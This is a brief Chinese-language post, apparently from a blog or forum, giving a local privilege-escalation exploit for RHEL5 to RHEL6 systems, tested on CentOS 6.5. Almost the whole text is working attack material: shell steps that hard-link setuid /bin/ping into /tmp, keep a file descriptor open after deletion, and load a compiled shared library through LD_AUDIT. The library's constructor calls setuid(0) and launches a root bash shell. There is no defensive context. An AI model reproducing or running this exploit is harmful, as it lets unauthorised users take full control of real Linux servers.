RHEL5—RHEL6下都可以提权
本人测试环境CenOS6.5:该方法只能用作与有root用户切换到普通用户的环境,如果是普通用户直接登录在执行最后一步的时候直接退出登录
$ mkdir /tmp/exploit
$ ln /bin/ping /tmp/exploit/target
$ exec 3< /tmp/exploit/target
$ ll /proc/$$/fd/3
$ rm -rf /tmp/exploit/
$ ll /proc/$$/fd/3
$ vim payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
编译payload.c
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3